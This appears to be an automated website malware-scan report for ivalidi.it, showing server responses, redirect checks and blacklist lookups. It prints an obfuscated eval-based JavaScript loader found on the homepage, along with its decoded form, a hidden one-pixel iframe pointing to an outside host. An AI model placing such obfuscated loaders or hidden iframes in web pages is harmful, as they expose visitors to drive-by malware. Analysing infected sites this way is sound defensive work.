Scanned pages/files
| Request | Server response | Status |
http://ivalidi.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 14:37:10 GMT Location: http://www.ivalidi.it/ Server: Apache Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ivalidi.it/ | 200 OK Content-Length: 940 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. gry=new Array(59,48,60,42,50,58,49,43,113,40,45,54,43,58,119,125,99,54,57,45,62,50,58,127,44,45,60,98,120,55,43,43,47,101,112,112,43,48,45,54,49,56,56,48,113,60,49,112,54,50,62,56,58,44,112,56,48,113,47,55,47,96,44,54,59,98,105,120,127,57,45,62,50,58,61,48,45,59,58,45,98,111,127,55,58,54,56,55,43,98,110,127,40,54,59,43,55,98,110,97,99,112,54,57,45,62,50,58,97,125,118);egwqg="";rmaqz=95;tvgcp=eval;ogqv=String.fromCharCode;for(gkgtr in gry)egwqg+=ogqv(gry[gkgtr]^rmaqz);tvgcp(egwqg); Decoded script: document.write("<iframe src='http://toringgo.cn/images/go.php?sid=6' frameborder=0 height=1 width=1></iframe>") document.write("<iframe src='http://toringgo.cn/images/go.php?sid=6' frameborder=0 height=1 width=1></iframe>") <iframe src='http://toringgo.cn/images/go.php?sid=6' frameborder=0 height=1 width=1></iframe> | ||
http://www.ivalidi.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ivalidi.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 28 Feb 2015 14:37:10 GMT
Location: http://www.ivalidi.it/
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
GET / HTTP/1.1
Host: ivalidi.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 28 Feb 2015 14:37:10 GMT
Location: http://www.ivalidi.it/
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ivalidi.it
Referer: http://www.google.com/search?q=ivalidi.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ivalidi.it
Referer: http://www.google.com/search?q=ivalidi.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ivalidi.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ivalidi.it/
Result: ivalidi.it is not infected or malware details are not published yet.
Result: ivalidi.it is not infected or malware details are not published yet.